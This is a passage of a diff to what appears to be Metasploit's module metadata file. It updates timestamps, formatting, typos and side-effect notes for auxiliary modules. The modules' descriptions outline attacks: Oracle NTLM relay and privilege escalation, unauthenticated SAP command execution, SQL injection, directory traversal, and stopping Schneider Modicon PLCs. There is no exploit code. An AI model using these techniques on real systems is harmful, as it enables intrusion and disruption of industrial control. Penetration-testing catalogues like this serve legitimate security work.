"fullname": "auxiliary/admin/networking/vyos_config",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8901,20 +9059,14 @@
"h00die"
],
"description": "This module imports a VyOS device configuration.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-03 18:12:53 +0000",
+ "mod_time": "2025-05-18 00:49:03 +0000",
"path": "/modules/auxiliary/admin/networking/vyos_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/vyos_config",
@@ -8925,25 +9077,17 @@
"Stability": [
"crash-safe"
],
- "SideEffects": [
- "ioc-in-logs"
- ],
- "Reliability": [
-
- ]
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/officescan/tmlisten_traversal": {
"name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access",
"fullname": "auxiliary/admin/officescan/tmlisten_traversal",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -8977,48 +9121,39 @@
"https"
],
"targets": null,
- "mod_time": "2017-11-09 03:00:24 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
"is_install_path": true,
"ref_name": "admin/officescan/tmlisten_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/ora_ntlm_stealer": {
"name": "Oracle SMB Relay Code Execution",
"fullname": "auxiliary/admin/oracle/ora_ntlm_stealer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-04-07",
"type": "auxiliary",
"author": [
"Sh2kerr "
],
- "description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your sever.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB sever with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server which\n runs Oracle. If not than you can decrypt HALFLM hash.",
+ "description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your server.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB server with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server which\n runs Oracle. If not than you can decrypt HALFLM hash.",
"references": [
"URL-http://dsecrg.com/pages/pub/show.php?id=17"
],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb",
"is_install_path": true,
"ref_name": "admin/oracle/ora_ntlm_stealer",
@@ -9026,19 +9161,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/oracle_index_privesc": {
"name": "Oracle DB Privilege Escalation via Function-Based Index",
"fullname": "auxiliary/admin/oracle/oracle_index_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-01-21",
"type": "auxiliary",
@@ -9046,21 +9184,17 @@
"David Litchfield",
"Moshe Kaplan"
],
- "description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.",
+ "description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.",
"references": [
"URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf"
],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_index_privesc",
@@ -9068,26 +9202,29 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/oracle_login": {
"name": "Oracle Account Discovery",
"fullname": "auxiliary/admin/oracle/oracle_login",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-11-20",
"type": "auxiliary",
"author": [
"MC "
],
- "description": "This module uses a list of well known default authentication credentials\n to discover easily guessed accounts.",
+ "description": "This module uses a list of well known default authentication credentials\n to discover easily guessed accounts.",
"references": [
"URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv",
"URL-https://seclists.org/fulldisclosure/2009/Oct/261"
@@ -9095,14 +9232,10 @@
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_login.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_login",
@@ -9110,19 +9243,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "account-lockouts"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/oracle_sql": {
"name": "Oracle SQL Generic Query",
"fullname": "auxiliary/admin/oracle/oracle_sql",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-12-07",
"type": "auxiliary",
@@ -9131,19 +9268,15 @@
],
"description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.",
"references": [
- "URL-https://www.metasploit.com/users/mc"
+ "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/"
],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_sql.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_sql",
@@ -9151,40 +9284,37 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/oraenum": {
"name": "Oracle Database Enumeration",
"fullname": "auxiliary/admin/oracle/oraenum",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez "
],
- "description": "This module provides a simple way to scan an Oracle database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.",
- "references": [
-
- ],
+ "description": "This module provides a simple way to scan an Oracle database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-06-23 09:30:35 +0000",
"path": "/modules/auxiliary/admin/oracle/oraenum.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oraenum",
@@ -9192,19 +9322,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/osb_execqr": {
"name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability",
"fullname": "auxiliary/admin/oracle/osb_execqr",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-01-14",
"type": "auxiliary",
@@ -9237,7 +9370,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr",
@@ -9245,19 +9378,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/osb_execqr2": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"fullname": "auxiliary/admin/oracle/osb_execqr2",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-08-18",
"type": "auxiliary",
@@ -9292,7 +9428,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr2",
@@ -9300,26 +9436,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/osb_execqr3": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"fullname": "auxiliary/admin/oracle/osb_execqr3",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-07-13",
"type": "auxiliary",
"author": [
"MC "
],
- "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).",
+ "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).",
"references": [
"CVE-2010-0904",
"OSVDB-66338",
@@ -9344,7 +9483,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr3",
@@ -9352,19 +9491,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/post_exploitation/win32exec": {
"name": "Oracle Java execCommand (Win32)",
"fullname": "auxiliary/admin/oracle/post_exploitation/win32exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-12-07",
"type": "auxiliary",
@@ -9373,19 +9515,15 @@
],
"description": "This module will create a java class which enables the execution of OS commands.",
"references": [
- "URL-https://www.metasploit.com/users/mc"
+ "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/"
],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb",
"is_install_path": true,
"ref_name": "admin/oracle/post_exploitation/win32exec",
@@ -9393,40 +9531,40 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/post_exploitation/win32upload": {
"name": "Oracle URL Download",
"fullname": "auxiliary/admin/oracle/post_exploitation/win32upload",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2005-02-10",
"type": "auxiliary",
"author": [
"CG "
],
- "description": "This module will create a java class which enables the download\n of a binary from a webserver to the oracle filesystem.",
+ "description": "This module will create a Java class which enables the download\n of a binary from a webserver to the Oracle filesystem.",
"references": [
"URL-http://www.argeniss.com/research/oraclesqlinj.zip"
],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb",
"is_install_path": true,
"ref_name": "admin/oracle/post_exploitation/win32upload",
@@ -9434,19 +9572,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/sid_brute": {
"name": "Oracle TNS Listener SID Brute Forcer",
"fullname": "auxiliary/admin/oracle/sid_brute",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
@@ -9455,20 +9597,16 @@
],
"description": "This module simply attempts to discover the protected SID.",
"references": [
- "URL-https://www.metasploit.com/users/mc",
+ "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/",
"URL-http://www.red-database-security.com/scripts/sid.txt"
],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/sid_brute.rb",
"is_install_path": true,
"ref_name": "admin/oracle/sid_brute",
@@ -9476,40 +9614,35 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/oracle/tnscmd": {
"name": "Oracle TNS Listener Command Issuer",
"fullname": "auxiliary/admin/oracle/tnscmd",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-02-01",
"type": "auxiliary",
"author": [
"MC "
],
- "description": "This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd",
- "references": [
-
- ],
+ "description": "This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd",
+ "references": [],
"platform": "",
"arch": "",
"rport": 1521,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-28 00:10:48 +0000",
"path": "/modules/auxiliary/admin/oracle/tnscmd.rb",
"is_install_path": true,
"ref_name": "admin/oracle/tnscmd",
@@ -9517,26 +9650,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/pop2/uw_fileretrieval": {
"name": "UoW pop2d Remote File Retrieval Vulnerability",
"fullname": "auxiliary/admin/pop2/uw_fileretrieval",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2000-07-14",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.",
+ "description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.",
"references": [
"OSVDB-368",
"BID-1484"
@@ -9544,14 +9680,10 @@
"platform": "",
"arch": "",
"rport": 109,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb",
"is_install_path": true,
"ref_name": "admin/pop2/uw_fileretrieval",
@@ -9559,19 +9691,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/postgres/postgres_readfile": {
"name": "PostgreSQL Server Generic Query",
"fullname": "auxiliary/admin/postgres/postgres_readfile",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -9579,9 +9714,7 @@
"todb "
],
"description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 5432,
@@ -9592,7 +9725,7 @@
"postgres"
],
"targets": null,
- "mod_time": "2024-02-19 10:57:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb",
"is_install_path": true,
"ref_name": "admin/postgres/postgres_readfile",
@@ -9600,21 +9733,25 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": [
"postgresql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/postgres/postgres_sql": {
"name": "PostgreSQL Server Generic Query",
"fullname": "auxiliary/admin/postgres/postgres_sql",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -9635,7 +9772,7 @@
"postgres"
],
"targets": null,
- "mod_time": "2024-03-05 17:49:13 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/postgres/postgres_sql.rb",
"is_install_path": true,
"ref_name": "admin/postgres/postgres_sql",
@@ -9643,21 +9780,24 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"postgresql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/registry_security_descriptor": {
"name": "Windows Registry Security Descriptor Utility",
"fullname": "auxiliary/admin/registry_security_descriptor",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -9665,9 +9805,7 @@
"Christophe De La Fuente"
],
"description": "Read or write a Windows registry security descriptor remotely.\n\n In READ mode, the `FILE` option can be set to specify where the\n security descriptor should be written to.\n\n The following format is used:\n ```\n key: \n security_info: \n sd: \n ```\n\n In WRITE mode, the `FILE` option can be used to specify the information\n needed to write the security descriptor to the remote registry. The file must\n follow the same format as described above.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -9691,9 +9829,7 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"config-changes"
]
@@ -9716,9 +9852,7 @@
"auxiliary_admin/sap/cve_2020_6207_solman_rce": {
"name": "SAP Solution Manager remote unauthorized OS commands execution",
"fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-10-03",
"type": "auxiliary",
@@ -9768,9 +9902,7 @@
"config-changes",
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -9796,9 +9928,7 @@
"auxiliary_admin/sap/cve_2020_6287_ws_add_user": {
"name": "SAP Unauthenticated WebService User Creation",
"fullname": "auxiliary/admin/sap/cve_2020_6287_ws_add_user",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-07-14",
"type": "auxiliary",
@@ -9851,9 +9981,7 @@
"config-changes",
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -9871,9 +9999,7 @@
"auxiliary_admin/sap/sap_configservlet_exec_noauth": {
"name": "SAP ConfigServlet OS Command Execution",
"fullname": "auxiliary/admin/sap/sap_configservlet_exec_noauth",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-11-01",
"type": "auxiliary",
@@ -9881,7 +10007,7 @@
"Dmitry Chastuhin",
"Andras Kabai"
],
- "description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.",
+ "description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.",
"references": [
"OSVDB-92704",
"EDB-24963",
@@ -9906,7 +10032,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_configservlet_exec_noauth",
@@ -9914,19 +10040,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/sap/sap_igs_xmlchart_xxe": {
"name": "SAP Internet Graphics Server (IGS) XMLCHART XXE",
"fullname": "auxiliary/admin/sap/sap_igs_xmlchart_xxe",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-03-14",
"type": "auxiliary",
@@ -9973,9 +10102,7 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -9993,9 +10120,7 @@
"auxiliary_admin/sap/sap_mgmt_con_osexec": {
"name": "SAP Management Console OSExecute",
"fullname": "auxiliary/admin/sap/sap_mgmt_con_osexec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10026,7 +10151,7 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_mgmt_con_osexec",
@@ -10034,19 +10159,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": {
"name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection",
"fullname": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-04-08",
"type": "auxiliary",
@@ -10054,7 +10182,7 @@
"rgod ",
"juan vazquez "
],
- "description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. This module can be used to extract the site\n and project usernames and hashes.",
+ "description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. This module can be used to extract the site\n and project usernames and hashes.",
"references": [
"CVE-2014-0763",
"ZDI-14-077",
@@ -10081,7 +10209,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-09-22 02:56:51 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb",
"is_install_path": true,
"ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli",
@@ -10089,19 +10217,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/ge_proficy_substitute_traversal": {
"name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal",
"fullname": "auxiliary/admin/scada/ge_proficy_substitute_traversal",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-01-22",
"type": "auxiliary",
@@ -10109,7 +10240,7 @@
"Unknown",
"juan vazquez "
],
- "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.",
+ "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.",
"references": [
"CVE-2013-0653",
"OSVDB-89490",
@@ -10119,14 +10250,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb",
"is_install_path": true,
"ref_name": "admin/scada/ge_proficy_substitute_traversal",
@@ -10134,19 +10261,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/modicon_command": {
"name": "Schneider Modicon Remote START/STOP Command",
"fullname": "auxiliary/admin/scada/modicon_command",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-04-05",
"type": "auxiliary",
@@ -10154,21 +10284,17 @@
"K. Reid Wightman ",
"todb "
],
- "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.",
+ "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 502,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
